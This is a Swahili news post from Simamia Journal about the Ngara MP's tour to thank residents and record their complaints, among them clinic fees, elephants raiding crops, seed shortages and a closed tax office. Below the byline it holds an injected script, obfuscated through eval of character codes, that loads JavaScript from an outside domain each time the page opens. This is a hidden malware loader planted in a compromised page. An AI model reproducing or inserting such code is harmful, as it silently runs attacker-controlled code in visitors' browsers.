Recent Comments

ZIARA YA KUSHUKURU WANANCHI NA KUSIKILIZA KERO IMELETA MATUNDA MAKUBWA SANA JIMBONI NGARA.

By Simamia Journal Dec 30, 2020
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>

Mamia ya wananchi wa Jimbo la Ngara walijitokeza kwenye mikutano iliyo andaliwa na Mbunge kwa Kushirikiana na Ofisi ya Mkurugenzi wa Wialaya ya Ngara Bwana Aidan Bahama pamoja na Ofisi ya CCM wialaya ya Ngara.

Jopo la wataalamu kutoka kwenye Taasisi pamoja na Wakuu wa Idara ya Halmashauri ya Wialaya ya Ngara waliambatana na Mh. Mbunge kwenda kushukuru na kusikiliza kero za Wananchi.

Ziara hii imesaidia mambo mengi ikiwemo;

1. Kuleta matumaini kwa wananchi wa Wialaya ya Ngara ambao wengi wao walionekana kukosa imani na Serikali yao hasa kwa kukosa taarifa sahihi hasa zinazohusiana na AFYA.

2. Ziara ilitoa fursa kwa wakuu wa Idara wa Halmashauri ya Wialaya ya Ngara kuelezea Sera ya Afya ya huduma Bure za Matibabu pamoja na mchango wa wananchi katika ujenzi wa miundombinu ya shule na vituo vya Afya. Baada ya wataalamu kuelezea wananchi walionekana kuelewa na kuahidi kujipanga ili kutekeleza matakwa ya kisera.

3. Ziara ilitoa fursa ya kuelewa kero mbali mbali walizonazo wananchi. Baadhi ya kero zilijibiwa hapo hapo huku nyingine zikiwa zimechukuliwa kwa ajili ya kufanyiwa kazi.

4. Ziara ilisaidia kutoa hamasa ya ulinzi wa miundombinu ya Umeme na Maji vijijini baada ya kugundua maeneo zaidi ya 3 ambapo miundombinu imehujumiwa.

5. Ziara ilibainisha changamoto kubwa ambazo zinatakiwa kufanyiwa kazi haraka. Mfano;
a. Wananchi wenye BIMA za CHF kutopewa kipao mbele wanapo kwenda hospital au zahanati kutibiwa huku wananchi wenye fedha taslimu wakiwa wanachangamkiwa.

b. Madai ya Vibarua waliopewa kazi za ujenzi wa miundombin mbali mbali yaliibuka na wananchi walisema kuwa Mkuu wa Mkowa wa Kagera aliagiza kuwa walipwe ila mpaka wakati wa mikutano hakuna kilichokuwa kimefanyika.

C. Kero ya tembo zaidi ya 100 kuvamia mashamba ya wananchi na kufanya uharibifu mkubwa. Wananchi wameomba msaada wa haraka.

d. Wananchi wameandaa mashamba ya kulima alizeti na kahawa kwenye msimu unao kuja. Hawajui kama watapata mbegu. Ombi lilitolewa kwenye ofisi ya kilimo ili isaidie kusambaza mbegu ya alizeti kwa wakulima pamoja na miche ya kahawa.

e. Murusagamaba wanaomba kuwezeshwa kulima zao la Michikichi kwa vile vijiji jirani vya kasulu wanalima zao hilo na lina stawi vema. Walisema hawana zao la Biashara hivyo wasaudiwe kulima zao hilo.

f. Wananchi wa Murusagamba wanakwenda kutibiwa kwenye vituo vya Afya vya jirani vilivyopo ndani ya mkowa wa Kigoma kwa sababu ya upatikanaji w a Dawa na malipo nafuu ya kumwona Mganga au Dakitari. Kwa kigoma gharama ni kagi ya TZS 1000 hadi 2000 wakati kwa upande wa Murusagamba gharama ni TZS 5,000.

g. Ofisi ya TRA ya Murusagamba haifanyikazi maana kila kitu kinafanyikia kabanga ikiwemo malipo hali ambayo inawasumbua wafanyabiashafa wanatumia border ya murusagamba kusafirisha bidhaa zao kwenda Burundi. Wananchi waomba serikali kufungua Ofisi ya TRA ya Murusagamba.

h. Kuna migogoro ya Wakulima na Wafugaji kwa kata za Kasulo na Kabanga pamoja na Mganza. Wananchi waiomba serikali iingilie kati kabla hayajatokea matatizo makubwa.

Ziara ili ibua mambo mengi ambapo taatifa kamili ya ziara hiyo itatoa kila kitu kilicho jitokeza

Mh. Mbunge wa Jimbo la Ngara alichangia miradi mbali mbali ya Maendeleo katika ziara hiyo ikiwa ni pamoja na kuhimiza wananchi kuchangia miradi ya maendeleo na kulipa tozo mbali mbali za Halmashauri ya Wilaya ya Ngara.

Juventus Juvenary
Katibu wa Mbunge
Jimbo la Ngara.

By Simamia Journal

Tangaza nasi. www.simamia.com YouTube Chanel: www.youtube.com/c/SimamiaTv